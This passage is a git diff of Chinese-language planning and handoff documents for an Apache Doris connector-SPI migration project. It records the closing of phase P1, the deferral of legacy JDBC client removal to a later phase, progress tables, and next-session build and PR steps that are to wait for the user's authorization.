转交用户在本地跑)—— **已 commit**(用户人工 review 通过;hash 见 `git log --oneline -3`,subject `[feat](connector) add P0 batch 2 gate + unit tests (T21-T23, T26-T27)`) -- **预估 context 使用**:~55%(健康) +- **本 session 主题**:**P1 阶段关闭**(批 B = T1 推迟到 P8;in-scope 100% 完成) +- **预估 context 使用**:~25%(健康;本场无编码,主要是 recon + 用户决议 + 跟踪文档同步) --- ## ✅ 本 session 完成项 -### 1. P0 批 2:守门 + 单测(T21-T23, T26-T27) +### 1. 批 B (T1) recon — 揭示 callers 非 dead code -| ID | 任务 | 文件 | 备注 | -|---|---|---|---| -| T21 ✅ | `tools/check-connector-imports.sh` | **新** `tools/check-connector-imports.sh` | grep 守门;接受可选 ROOT 参数;正负冒烟均通过 | -| T22 ✅ | exec-maven-plugin 接入脚本 | edit `fe-connector/pom.xml` | 绑 `validate` 阶段;`inherited=false`;用 `${project.basedir}/../../tools/...` 避开 `fe.dir` 解析时序 | -| T23 ✅ | `FakeConnectorPlugin` + 默认行为测试 | **新** `fe-core/src/test/java/.../connector/fake/{FakeConnectorPlugin,FakeConnectorPluginTest}.java` | 11 个 @Test;零 override 的 `FakeMetadata` 验证所有 default 路径 | -| T24 ⏳ | JDBC regression-test | — | **转交用户**在本地跑 | -| T25 ⏳ | ES regression-test | — | **转交用户**在本地跑 | -| T26 ✅ | `ExternalMetaCacheInvalidator` 路由测试 | **新** `fe-core/src/test/java/.../connector/ExternalMetaCacheInvalidatorTest.java` | 5 个 @Test;`MockedStatic` + `mock(ExternalMetaCacheMgr)`;pin partition fallback & stats no-op | -| T27 ✅ | converter 单测 | **新** `fe-core/src/test/java/.../connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java` | 7 个 @Test;`mock(CreateTableInfo)` 绕开 18-arg ctor;4 partition style + 2 bucket + 列穿透 | +启动批 B 前对 `Jdbc*Client.java` + `JdbcFieldSchema.java` 的 fe-core 引用做了 Explore subagent 调研。结论: -### 2. 验证 +| Caller(路径) | Live? | 用途 | +|---|---|---| +| `job/extensions/insert/streaming/PostgresResourceValidator.java` | ✅ 活 | CREATE JOB 时校验 PG 复制槽 / 发布;被 StreamingJobUtils → StreamingInsertJob → CreateJobCommand 链调用 | +| `job/util/StreamingJobUtils.java` | ✅ 活 | `getJdbcClient()` + `getPrimaryKeys`/`getColumnsFromJdbc`/`getTablesNameList`,CDC 表枚举 + DDL 生成 | +| `tablefunction/CdcStreamTableValuedFunction.java` | ✅ 活 | `cdc_stream` TVF,被 `CdcStream.java:46` 调,streaming 作业执行链路 | -- `tools/check-connector-imports.sh` 正/负冒烟测试通过 -- `mvn -pl fe-connector validate -Dmaven.build.cache.enabled=false` → **BUILD SUCCESS**(exec-maven-plugin 调起脚本) -- `mvn -pl fe-core -am test -Dtest='FakeConnectorPluginTest,ExternalMetaCacheInvalidatorTest,CreateTableInfoToConnectorRequestConverterTest,ConnectorPluginManagerTest,ConnectorSessionImplTest' -DfailIfNoTests=false -Dmaven.build.cache.enabled=false` → **39/39 tests green** -- `mvn -pl fe-core checkstyle:check` → **0 violations** +测试侧:`StreamingJobUtilsTest`(需重写);`JdbcFieldSchemaTest` / `JdbcClickHouseClientTest` / `JdbcClientExceptionTest`(测 legacy 本身,随源删除)。 -### 3. 文档同步(§5.1 五步纪律) +fe-connector 侧 SPI 替换 `Jdbc*ConnectorClient`(ClickHouse/DB2/MySQL/Oracle/PostgreSQL/SQLServer/SapHana/Gbase)已就位,但 **fe-core 不能直接 import** —— 会破坏 `tools/check-connector-imports.sh` 守门。 -- ✅ `tasks/P0-spi-foundation.md`:T21-T23, T26-T27 状态翻 ✅;T24-T25 owner 改 @用户;新增 2026-05-24(夜 ③)日志条目(含 4 项 trade-off 说明);顶部验收清单 5 项翻 [x] -- ✅ `PROGRESS.md`:§一 P0 进度条 74% → 93%;§三 P0 表追加批 2 7 行;§四加 2026-05-24(夜 ③)条目;§七 session 状态滚动 -- ✅ 本 HANDOFF.md 覆写 -- N/A `connectors/.md`(本场不属任何具体连接器) -- N/A `decisions-log.md` / `deviations-log.md`(trade-off 都在 RFC §15 范围内,未升 DV) +### 2. 用户决议(Q4):推迟 T1 到 P8 收尾 -### 4. Commit(用户人工 review 通过后) +- 删 T1 需要在 `ConnectorPlugin`/`ConnectorMetadata` 上为 CDC use case 暴露 `getPrimaryKeys` / `getColumnsFromJdbc` / `listTables` 新 capability — 是 SPI 扩展工作,超出 Master Plan §3.2 P1 scope +- 现状无 runtime 风险——legacy JDBC client 仍在原位,CDC 功能正常 +- 决策:T1 推迟到 P8 收尾,与 streaming CDC 重构一起做(避免 P1 阶段引入 1-2 天计划外 SPI 设计) -- ✅ `[feat](connector) add P0 batch 2 gate + unit tests (T21-T23, T26-T27)`(hash 见 `git log --oneline -3`) -- 9 files changed:1 个 pom edit(fe-connector)+ 5 个新文件(1 脚本 + 4 测试相关)+ 3 个 plan-doc 更新 -- 工作树 clean +P1 状态因此提前关闭:**in-scope (T3+T4+T5) 100% 完成;T1 推迟 P8;T2 推迟 P4/P5**。 + +### 3. 跟踪文档同步 + +- `tasks/P1-scan-node-cleanup.md`:元信息状态翻 ✅;验收标准重新对齐(标 🚫/[x]/🟡);任务表 T1 翻 🚫 + 备注引用 Q4;新增 白天 ④ 阶段日志条目;当前阻塞项更新 +- `PROGRESS.md`:header 项目总进度 16% → 20%;§一 P1 → 100% ✅;§一 P2 → 🚧 准备启动;全局进度 8% → 12%;§三 P1 表 header 改 "✅ 已完成",T1 行翻 🚫;§四加 白天 ④ 条目;§七 session 状态更新 +- `HANDOFF.md`(本文件):覆盖更新到 P1 阶段关闭状态 --- ## 🚧 本 session 进行中 / 未完成 -- **T24/T25**:JDBC + ES regression-test 转交用户在本地跑(containers / docker 在本地更稳)。任务状态保持 ⏳,owner 改为 @用户。完成后用户在 PROGRESS / tasks 上翻 ✅ 即可 -- **本 HANDOFF 在 commit 内**——内容写的是 post-commit 状态,与 batch 2 代码、plan-doc 更新一并 commit。不需要后续 amend +无编码工作。剩余动作: + +1. **commit 本场 plan-doc 改动** — 3 个文件(P1 task / PROGRESS / HANDOFF) +2. **push `catalog-spi-02` 到 morningman fork**(**待用户授权**)— 含批 A commit `43a12a05ffe` + 本场 doc commit +3. **`gh pr create --repo apache/doris --base branch-catalog-spi --head morningman:catalog-spi-02`**(**待用户授权**) --- ## 📝 关键认知 / 临时发现 -继承上版认知不变。**本场新增**: +继承前一版认知。**本场新增**: -1. **maven-enforcer-plugin 不能原生 exec shell**——RFC §15.4 原文写"挂到 maven enforcer plugin",但 enforcer 只有 `requireXxx` 系列 rule 和 `EvaluateBeanshell`,没有内置的 shell-exec rule。要么写 Java 自定义 Rule 类(重)要么走 `EvaluateBeanshell`(不直观)。**最终选择 `exec-maven-plugin`**——fe-common 已用它跑 make + protoc,零新依赖;脚本 non-zero exit 即触发 `BUILD FAILURE`,效果等价 -2. **`directory-maven-plugin` 的 `fe.dir` 属性在 `validate` 阶段还没 set**——它绑 `initialize` 阶段(晚于 validate)。第一次写 pom 用了 `${doris.home}/tools/...`(`doris.home=${fe.dir}/../`),结果路径解析为字面值 `${fe.dir}/..//tools/...`。改用 `${project.basedir}/../../tools/...`(fe-connector aggregator basedir → workspace root → tools)避开属性时序问题 -3. **exec-maven-plugin 在 aggregator pom 的继承默认是 `inherited=true`**——会让 11 个 fe-connector-* 子模块每次都重跑同一份扫描。本场设 `inherited=false`,只在 aggregator 自身 lifecycle 跑一次。Trade-off:dev 跑单个子模块 `mvn -pl fe-connector/fe-connector-iceberg compile` 时不会自动触发守门,但顶层 `mvn install` 必扫 -4. **`ConnectorMetaInvalidator` 的方法名是 `invalidateAll()` 不是 `invalidateCatalog()`**——第一稿测试写错卡了一次 test-compile。SPI 接口侧明确写 `invalidateAll`("Invalidates the entire catalog's metadata caches"),fe-core 侧 `ExternalMetaCacheInvalidator.invalidateAll() → mgr.invalidateCatalog(catalogId)` 这才是路由 -5. **`Mockito.mockStatic(Env.class)`** 模式在 fe-core 已有先例(`BDBDebuggerTest:115`),mockito-inline 是 fe 顶层 pom 已声明的 test dep,新测试可以直接用,无需修改任何 pom -6. **`Mockito.mock(CreateTableInfo.class)`** 比真正构造 18-arg `CreateTableInfo` 更便捷——converter 只读 8 个 getter,全部 stub 即可。如未来 converter 用到更多 getter,在 `stubInfo` helper 加新 stub -7. **`mvn -pl fe-core test` 不带 `-am` 失败**(缺 fe-grpc / fe-filesystem-* 等本地未 install 的 SNAPSHOT)。本场所有 fe-core 测试运行都用 `mvn -pl fe-core -am test -Dtest=... -DfailIfNoTests=false -Dmaven.build.cache.enabled=false`。`-DfailIfNoTests=false` 是必须的——`-am` 会带上 fe-foundation 等 upstream,它们没有匹配 `-Dtest=` 的测试就会爆 surefire 错 -8. **fe-connector 模块当前 import 现状**:`grep -rEn "^import org\.apache\.doris\." fe/fe-connector/*/src/main/java | awk` → 仅 4 个根包 `connector / extension / thrift / trinoconnector`。所有禁词包(catalog/common/datasource/qe/analysis/nereids/planner)都被守门,baseline 已经合规 +1. **`tools/check-connector-imports.sh` 是一个隐含的设计约束** — fe-core 不能 import fe-connector 内部类(`org.apache.doris.connector.*`),所以"复用"SPI 实现唯一通道是 `ConnectorPlugin` 接口。批 B 直接 import `JdbcConnectorClient` 替换 `JdbcClient` 本能解法**走不通**——一定要经过 SPI capability 扩展。这条约束以前 P0 文档讲过,但批 B recon 时是第一次真正触发它 +2. **CDC streaming 是 SPI 未覆盖的 use case** — 现有 SPI(ConnectorMetadata.getTable / listTables / getTableHandle)是面向"标准 SELECT"的,没暴露 PK 探测、columns-from-jdbc-driver、replication-slot 校验。P8 启动前需要先在 RFC 中起 §17 章节描述这套扩展,否则 P8 实施会 stall +3. **fe-connector 侧的 `Jdbc*ConnectorClient` 是 P0 阶段 JDBC 迁移的产物** — 它们没有暴露 PK / column-from-driver 接口(按 ConnectorMetadata 标准抽象设计),所以即便允许 fe-core 直接 import 也不能直接替换 legacy client。换言之 SPI 设计本身需要扩展(不只是 "改 import 路径") --- ## 🎯 下一个 session 第一件事 -### Track A:等 T24/T25 收尾 +> P1 已关闭。下一阶段 P2 (trino-connector,2 周)。**预备动作**:先把批 A push + PR,再做 P2 recon。 ``` -1. 用户跑完 JDBC + ES regression-test 后 -2. tasks/P0-spi-foundation.md 把 T24/T25 翻 ✅ -3. PROGRESS.md 进度条 93% → 100%;状态 🚧 → ✅ -4. 写 P0 阶段收尾 commit(如果 T24/T25 有微调代码) +1. git branch --show-current → 确认在 catalog-spi-02 + git status → 应 clean(本场 doc commit 已 push 前提下) + git log --oneline -3 → 应见 2 个本地未推 commit: + a) 批 A scan-node 收口(43a12a05ffe) + b) P1 关闭 + T1 推迟 P8 doc commit +2. 读 PROGRESS.md + 本 HANDOFF + tasks/P1-scan-node-cleanup.md(确认 P1 已 ✅) +3. push + PR(如本场尚未完成): + git push -u origin catalog-spi-02 + gh pr create --repo apache/doris --base branch-catalog-spi \ + --head morningman:catalog-spi-02 \ + --title "[P1-T03-T05] route plugin-driven scans first in nereids translator" +4. 启动 P2 (trino-connector) recon — 用 Explore subagent: + a. fe-core 侧 `datasource/trinoconnector/` 现状(多少类、多少 LOC) + b. fe-connector 侧 trino-connector 模块完成度(连接器看板里目前标 70%) + c. SPI_READY 加进 `CatalogFactory.SPI_READY_TYPES` 的预条件 + d. 反向 instanceof:grep "instanceof.*Trino" in nereids/planner(看板里目前标 0/2) +5. 创建 plan-doc/tasks/P2-trino-connector-migration.md(_template.md 复制) +6. 守门:P2 改动跨 fe-core + fe-connector 双侧,每次 commit 前 + - `mvn -pl fe-connector validate` 触发 check-connector-imports.sh + - `mvn -pl fe-core checkstyle:check` ``` -### Track B:选 P0 末加项 vs 直接进 P1 +--- + +## ⚠️ 开放问题 / 风险提示 -- **选项 B1**:P0-T28 benchmark(R-006 缓解,1k catalog × `listTableNames` 性能基线)。原列入 P1,可前置到 P0 末加,让 P0 出阶段干净 -- **选项 B2**:直接进 P1(scan-node 收口 + 重复清理)。P0 既然 93% 接近收尾,T24/T25 跑完即关阶段 -- 推荐 B2(B1 在 P1 阶段开题更自然,benchmark 跟 scan-node 工作正好同期) +继承前一版;批 B 关闭 1 项、转入 P8 待办 1 项;其余沿用。 -### ~~Track C:commit 批 2~~(已收尾) +### 本场关闭 -批 2 已合入 `catalog-spi-00`;无需再开 Track C。 +- ~~T1 何时实施~~ — 已决:推迟 P8 收尾 ---- +### 本场新增(P8 待办) -## ⚠️ 开放问题 / 风险提示 +1. **P8 SPI 扩展:CDC capability 群**:为 streaming CDC 在 SPI 上暴露 `getPrimaryKeys` / `getColumnsFromJdbc` / `listTables`(候选:`ConnectorMetadata` 新 default 方法 + 或 `ConnectorPlugin` 上的 `Optional`);改写 PostgresResourceValidator / StreamingJobUtils / CdcStreamTableValuedFunction 走 SPI;重写 StreamingJobUtilsTest;批量删 13 个 Jdbc*Client + JdbcFieldSchema + 3 个 legacy test。**预估**:~1-2 天 SPI 设计 + ~1 天实施 +2. **P8 启动前 RFC 扩展**:在 `01-spi-extensions-rfc.md` 新增 §17 章节描述 CDC capability 设计;否则 P8 实施会 stall -继承上版 7 项不变(删了"未 commit batch 1"项;增加本场 trade-off): - -1. **守门挂 `exec-maven-plugin` 而非 `maven-enforcer-plugin`**:RFC §15.4 原文写后者。本场用前者(等价实现,0 新依赖)。是否在 RFC §15.4 加脚注说明这个偏差?**判断**:trade-off 在 RFC 范围内,不升 DV;若有 reviewer 强烈要求 enforcer 写 Java Rule 类再重做 -2. **守门 `inherited=false`**:dev 跑单连接器 `mvn -pl fe-connector/fe-connector-iceberg compile` 时不会触发。是否要改 `inherited=true`?**判断**:现状没人手动跑这条命令日常迭代,重复扫的成本(11 × ~50ms)也不大;如未来某个连接器开发体感差再改 -3. **`invalidatePartition` 测试 pin 当前 fallback**:一旦 SPI 在该方法签名上加 column 名携带能力,bridge 和测试必须同步更新。测试已留 inline comment 描述意图 -4. **`CreateTableInfo` 用 mock**:converter 改用 mock 之外的 getter 时,需在 `stubInfo` helper 加新 stub。Trade-off:测试更聚焦但代价是输入对象不"真实" -5. **partition 风格的 IDENTITY vs TRANSFORM 判别**:测试覆盖了"全 UnboundSlot → IDENTITY"和"含 UnboundFunction → TRANSFORM"两路径,但没覆盖"UnboundSlot + UnboundFunction 混合"——按 converter 当前实现,只要有任意一个 UnboundFunction 就走 TRANSFORM 路径,UnboundSlot 在 `convertFields()` 里也会被识别为 `identity` transform。这个混合场景的语义是否符合预期?**判断**:RFC §4.2 未明确混合用法,留待 P5/P6 Iceberg 真正用到时评估 -6. (沿用)`ColumnDefinition.defaultValue` SPI 缺位 -7. (沿用)LIST/RANGE `initialValues` flatten 缺位 -8. (沿用)`PluginDrivenExternalCatalog.createTable` 返回值丢失"已存在"信息 -9. (沿用)bucket 算法名 `"doris_default"` / `"doris_random"` 占位 -10. (沿用)Maven build cache 误导问题;`mvn -pl fe-core` 必须 cwd=`fe/` -11. (沿用)`PluginDrivenTransactionManager.begin(ConnectorTransaction)` 暂无 caller -12. (沿用)`invalidatePartition` fallback;`invalidateStatistics` no-op -13. (沿用,本场强化)**`mvn -pl fe-core test` 不带 `-am` 失败**:必须 `-am -DfailIfNoTests=false` +### 沿用(保留) + +3. **T4 PluginDrivenScanNode 不支持 hudi 增量场景** — `incrementalRelation` 待 P3 Hudi 迁移时 SPI 扩展 +4. **T2 已推迟到 P4/P5**(用户决议 Q2,2026-05-25) +5. **T3 fallback 保留期跨度长**(P1 → P7 20 周)—— 每连接器在 P3-P7 迁移完成后立即删对应 fallback +6. (沿用 P0)`ColumnDefinition.defaultValue` SPI 缺位 — P5/P6 评估 +7. (沿用 P0)LIST/RANGE `initialValues` flatten 缺位 — P5/P6 评估 +8. (沿用 P0)`PluginDrivenExternalCatalog.createTable` 返回值丢失"已存在"信息 — P5/P6/P7 评估 +9. (沿用 P0)bucket 算法名 `"doris_default"` / `"doris_random"` 占位 — Hive/Iceberg 自己推导 +10. (沿用 P0)Maven build cache 误导;`mvn -pl fe-core` 必须 cwd=`fe/` + `-am`;`-Dtest=` 务必带 `-DfailIfNoTests=false` +11. (沿用 P0)`PluginDrivenTransactionManager.begin(ConnectorTransaction)` 暂无 caller — P5/P6/P7 接通 +12. (沿用 P0)`ConnectorMetaInvalidator.invalidatePartition` fallback 到 invalidateTable;`invalidateStatistics` no-op +13. (沿用 P0)`mvn -pl fe-core test` 不带 `-am` 失败 --- ## 📂 当前关键文件清单 -### 本场新增 / 修改(已 commit) +### 本场(2026-05-25 白天 ④)修改 + +``` +MOD plan-doc/tasks/P1-scan-node-cleanup.md (元信息 ✅;验收标准重对齐;T1 → 🚫;新增白天 ④ 日志) +MOD plan-doc/PROGRESS.md (P1 → 100% ✅;P2 → 准备启动;§三 T1 翻 🚫;§四加白天 ④) +MOD plan-doc/HANDOFF.md (本文件覆盖更新) +``` + +工作树状态(本场 commit 前): +``` + M plan-doc/tasks/P1-scan-node-cleanup.md + M plan-doc/PROGRESS.md + M plan-doc/HANDOFF.md +``` + +### 待 push 的本地 commit(catalog-spi-02 → upstream-apache/branch-catalog-spi) + +``` +43a12a05ffe [refactor](connector) [P1-T03-T05] route plugin-driven scans first in nereids translator +??????????? [doc](connector) [P1] close P1 — defer T1 to P8, batch A only ← 本场即将创建 +``` + +### P2 (trino-connector) 涉及的目标(recon 时确认) ``` -NEW tools/check-connector-imports.sh (gate script) -MOD fe/fe-connector/pom.xml (exec-maven-plugin) -NEW fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPlugin.java -NEW fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPluginTest.java (11 tests) -NEW fe/fe-core/src/test/java/org/apache/doris/connector/ExternalMetaCacheInvalidatorTest.java (5 tests) -NEW fe/fe-core/src/test/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java (7 tests) -MOD plan-doc/PROGRESS.md -MOD plan-doc/tasks/P0-spi-foundation.md -MOD plan-doc/HANDOFF.md(本文件) +fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/ (待 recon — 看现状) +fe/fe-connector/fe-connector-trino-connector/ (已存在;看板里标 70%) +nereids/glue/translator/PhysicalPlanTranslator.java (T3 fallback 待 P2 完成时清理 trino 分支) +CatalogFactory.SPI_READY_TYPES (P2 末加 "trino-connector" 进白名单) ``` ### 跟踪体系(沿用不变) ``` -plan-doc/ (~225K, 17 文件) +plan-doc/ (~225K, 18 文件) ├── 00-connector-migration-master-plan.md / 01-spi-extensions-rfc.md ├── README.md / PROGRESS.md / AGENT-PLAYBOOK.md / HANDOFF.md ├── decisions-log.md (18) / deviations-log.md (0) / risks.md (14) -├── tasks/{_template.md, P0-spi-foundation.md} +├── tasks/{_template.md, P0-spi-foundation.md, P1-scan-node-cleanup.md} └── connectors/{_template.md, jdbc, es, trino-connector, hudi, maxcompute, paimon, iceberg, hive}.md ``` @@ -148,11 +173,10 @@ plan-doc/ (~225K, 17 文件) ## 🧠 给下一个 agent 的 meta 建议 -- **当前分支是 `catalog-spi-00`**。新 session 开场 `git branch --show-current` 确认 -- **批 2(T21-T23, T26-T27)已合入 `catalog-spi-00`**(subject `[feat](connector) add P0 batch 2 gate + unit tests (T21-T23, T26-T27)`),无需 review 老代码;直接读最新源即可。如果对 6 个新/改文件有调整建议,走 DV 流程登记后再改,不要 silent edit -- **T24/T25 owner 是用户**,不要自己尝试跑 docker regression-test -- **Maven build 的 cwd 必须是 `fe/`**,不是 workspace 根;`mvn -pl fe-core` 需要 `-am`;运行 `-Dtest=` 时务必带 `-DfailIfNoTests=false`,否则 upstream 模块(fe-foundation 等)找不到匹配 test 会爆 surefire 错 -- 本场没产生新 decision / deviation——所有 trade-off 在 RFC §15 范围内,由代码注释 + 本 HANDOFF "开放问题" 列出 -- 本场用 `Mockito.mockStatic` + `Mockito.mock(CreateTableInfo)` 两个套路绕开了重度 fe-core bootstrap——批 1 的 `CreateTableInfoToConnectorRequestConverter` 同样可以这样测,套路通用。后续 P1/P2 写 unit-test 可以复用 -- **必读 AGENT-PLAYBOOK §六 anti-patterns** 再开始动手 -- **本 HANDOFF 不内嵌 commit hash**——hash 通过 `git log --grep="P0 batch 2"` 或 `git log --oneline -3` 定位。本场无 amend,HANDOFF 与代码同 commit 落盘 +- **分支 `catalog-spi-02`**:本场结束时含 2 个本地未推 commit(批 A scan-node + P1 关闭 doc)。push 与 PR 创建是**风险动作**,必须先与用户确认(已在本场末尾问过;如本场已 push,下场看 `git log --oneline -3` 验证 `origin/catalog-spi-02` 同步) +- **PR 目标分支永远是 `apache/doris:branch-catalog-spi`**(不是 master) +- **commit message** 沿用 `[refactor|feat|doc](connector) [Pn-Tnn] ...` 前缀风格(AGENT-PLAYBOOK §5.4) +- **Maven 命令**:cwd=`fe/`;`mvn -pl fe-core -am compile -Dmaven.build.cache.enabled=false`;测试用 `-Dtest=... -DfailIfNoTests=false` +- **P2 启动前必读**:`connectors/trino-connector.md`(连接器看板里目前 70% 完成度)+ Master Plan §3.3 P2 章节 +- **P2 主要工作量预估**:补齐 fe-connector trino-connector 模块剩余 30%(核心是 catalog 注册 + SPI_READY_TYPES);删 fe-core 侧 trino-connector legacy;清掉 T3 fallback 中的 trino 分支(PhysicalPlanTranslator) +- **不要试图删 13 个 Jdbc*Client** — P1 阶段已决议推迟到 P8。看到 legacy jdbc client 不要技痒 diff --git a/plan-doc/PROGRESS.md b/plan-doc/PROGRESS.md index b41dc3f458594f..518a1cd8cf2fee 100644 --- a/plan-doc/PROGRESS.md +++ b/plan-doc/PROGRESS.md @@ -1,6 +1,6 @@ # 📊 项目进度仪表盘 -> 最后更新:**2026-05-24(夜 ③)** | 当前阶段:**P0 SPI 缺口补齐**(批 0 + 批 1 + 批 2 代码侧完成;待 T24-T25 用户跑 JDBC/ES regression-test) | 项目总进度:**13%** +> 最后更新:**2026-05-25** | 当前阶段:**P1 已收口**(in-scope T3+T4+T5 完成;T1 推迟 P8、T2 推迟 P4/P5;待 batch A push + PR)→ **P2 trino-connector 准备启动** | 项目总进度:**20%** > [README](./README.md) · [Master Plan](./00-connector-migration-master-plan.md) · [SPI RFC](./01-spi-extensions-rfc.md) · [Decisions](./decisions-log.md) · [Deviations](./deviations-log.md) · [Risks](./risks.md) · [Agent Playbook](./AGENT-PLAYBOOK.md) · [Handoff](./HANDOFF.md) --- @@ -9,9 +9,9 @@ | 阶段 | 范围 | 估时 | 进度 | 状态 | 任务文档 | |---|---|---|---|---|---| -| **P0** | SPI 缺口补齐 | 2 周 | ▰▰▰▰▰▰▰▰▰▱ 93% | 🚧 收尾(批 0 + 1 + 2 代码侧完成 T03-T23, T26-T27;T24-T25 用户在本地跑 regression-test) | [tasks/P0](./tasks/P0-spi-foundation.md) | -| P1 | scan-node 收口 + 重复清理 | 1 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动(被 P0 阻塞)| — | -| P2 | trino-connector 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | +| **P0** | SPI 缺口补齐 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成(PR #63582 squash-merge `c6f056fa5bd`,T24-T25 流水线全绿)| [tasks/P0](./tasks/P0-spi-foundation.md) | +| **P1** | scan-node 收口 + 重复清理 | 1 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成(in-scope T3+T4+T5 ✅;T1 推迟 P8;T2 推迟 P4/P5;commit `43a12a05ffe` 待 push + PR)| [tasks/P1](./tasks/P1-scan-node-cleanup.md) | +| **P2** | trino-connector 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | 🚧 准备启动 | — | | P3 | hudi 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P4 | maxcompute 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P5 | paimon 迁移 | 3 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | @@ -19,7 +19,7 @@ | P7 | hive (+HMS) 迁移 | 6 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P8 | 收尾清理 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | -**全局进度:7%**(25 周计划中处于第 1 周末) +**全局进度:12%**(25 周计划中 P0+P1 共 3 周完成) --- @@ -44,7 +44,16 @@ > 状态非 ✅ 的项,按阶段聚合。详细见各阶段 task 文件。 -### P0 — SPI 缺口补齐 +### P1 — scan-node 收口 + 重复清理(✅ 已完成) +| ID | Task | 批次 | Owner | 状态 | 启动 | 备注 | +|---|---|---|---|---|---|---| +| P1-T03 | `PhysicalPlanTranslator.visitPhysicalFileScan` 收口(保留 fallback) | 批 A | @me | ✅ | 2026-05-25 | `PluginDrivenExternalTable` 分支已前置;7 个老分支保留 | +| P1-T04 | `visitPhysicalHudiScan` 委托给 `PluginDrivenScanNode` | 批 A | @me | ✅ | 2026-05-25 | SPI 分支已加;`incrementalRelation` 待 P3 SPI 扩展 | +| P1-T05 | `LogicalFileScan.computeOutput` 改走 SPI | 批 A | @me | ✅ | 2026-05-25 | `computePluginDrivenOutput` + `supportPruneNestedColumn` 显式分支 | +| P1-T01 | 删除 13 个 `Jdbc*Client.java` + `JdbcFieldSchema.java` | 🚫 推迟 P8 | — | 🚫 | — | 2026-05-25 决议(Q4):3 个 fe-core caller 是活的 CDC streaming 代码,删除需 SPI 扩展,P8 收尾时一并做 | +| P1-T02 | 重复 PaimonPredicateConverter + McStructureHelper 处理 | 🚫 推迟 P4/P5 | — | 🚫 | — | 用户决议 Q2(2026-05-25) | + +### P0 — SPI 缺口补齐(✅ 已完成) | ID | Task | Owner | 状态 | 启动 | 备注 | |---|---|---|---|---|---| | P0-T01 | RFC §16.2 决策点闭环 | @me | ✅ | 2026-05-24 | 全部 18 条决策已敲定 | @@ -72,8 +81,8 @@ | P0-T21 | `tools/check-connector-imports.sh` 实现 | @me | ✅ | 2026-05-24 | grep 守门;正/负冒烟均通过 | | P0-T22 | exec-maven-plugin 接入脚本(fe-connector aggregator validate) | @me | ✅ | 2026-05-24 | `inherited=false`;RFC §15.4 等价实现 | | P0-T23 | `FakeConnectorPlugin` + 11 个 default 行为测试 | @me | ✅ | 2026-05-24 | 覆盖 Connector/Metadata/TableOps/WriteOps/Session/Context 全 default | -| P0-T24 | JDBC regression-test 全套跑通 | @用户 | ⏳ | — | 用户在本地跑 | -| P0-T25 | ES regression-test 全套跑通 | @用户 | ⏳ | — | 用户在本地跑 | +| P0-T24 | JDBC regression-test 全套跑通 | @用户 | ✅ | 2026-05-25 | PR #63582 流水线绿 | +| P0-T25 | ES regression-test 全套跑通 | @用户 | ✅ | 2026-05-25 | PR #63582 流水线绿 | | P0-T26 | `ConnectorMetaInvalidator` 路由测试 | @me | ✅ | 2026-05-24 | 5 个 @Test;MockedStatic<Env> | | P0-T27 | `CreateTableInfoToConnectorRequestConverter` 单元测试 | @me | ✅ | 2026-05-24 | 7 个 @Test;4 partition style + 2 bucket | @@ -85,6 +94,9 @@ > 倒序,新内容置顶;超过 14 天的条目移除(git log 保留历史)。 +- **2026-05-25(白天 ④)** ✅ **P1 阶段关闭**:批 B (T1) recon 揭示 3 个 fe-core JDBC client caller(PostgresResourceValidator / StreamingJobUtils / CdcStreamTableValuedFunction)均为活的 CDC streaming 代码(非 dead code),删除需要在 ConnectorPlugin/ConnectorMetadata 上为 CDC 暴露新 capability(getPrimaryKeys / getColumnsFromJdbc / listTables)。用户决议(Q4):**推迟 T1 到 P8 收尾**(与 streaming CDC 重构一起做)。P1 in-scope(T3+T4+T5)100% 完成;剩余动作:batch A push + PR +- **2026-05-25(白天 ③)** ✅ **P1 批 A 完成**(T03+T04+T05 scan-node SPI 收口):`PhysicalPlanTranslator.visitPhysicalFileScan` `PluginDrivenExternalTable` 分支前置(T3);`visitPhysicalHudiScan` 加 SPI 分支并通过 `FileQueryScanNode` setters 透传 `scanParams`/`tableSnapshot`,`incrementalRelation` 记 P3 TODO(T4);`LogicalFileScan.computeOutput` 新增 `computePluginDrivenOutput()` helper + 显式 `supportPruneNestedColumn → false` 分支(T5)。fe-core BUILD SUCCESS + checkstyle 0;对当前 SPI 表(JDBC/ES)行为等价;7 个连接器特定分支原地保留作 P3-P7 fallback +- **2026-05-25** ✅ **P0 全阶段完成**:PR [#63582](https://github.com/apache/doris/pull/63582) squash-merge 到 `apache/doris:branch-catalog-spi`(hash `c6f056fa5bd`);T24/T25 流水线全绿;P0 阶段进度 100%。新本地分支 `catalog-spi-02` 基于最新 base 创建,**P1 启动**(scan-node 收口 + 重复清理,1 周) - **2026-05-24(夜 ③)** ✅ **P0 批 2 守门 + 单测完成**(T21-T23, T26-T27;T24-T25 用户跑):新增 `tools/check-connector-imports.sh` grep 守门 + 通过 exec-maven-plugin 在 `fe-connector` aggregator validate 阶段调起(`inherited=false`);新增 `FakeConnectorPlugin`(fe-core test)+ 23 个新 @Test 覆盖 11 个 default 路径 + ConnectorMetaInvalidator 5 个 routing + Converter 7 个(4 partition style × IDENTITY/TRANSFORM/LIST/RANGE + hash/random bucket + 列穿透);39/39 tests green;checkstyle 0;JDBC/ES regression-test 转交用户在本地执行 - **2026-05-24(夜 ②)** ✅ **P0 批 1 DDL + Partition SPI 完成**(T13-T20):新增 `connector.api.ddl` 包 5 个 POJO(CreateTableRequest + 4 spec);`ConnectorTableOps` 加 4 个 default(createTable(request) + listPartitionNames/listPartitions/listPartitionValues);`ConnectorPartitionInfo` 追加 rowCount/sizeBytes/lastModifiedMillis;fe-core 新 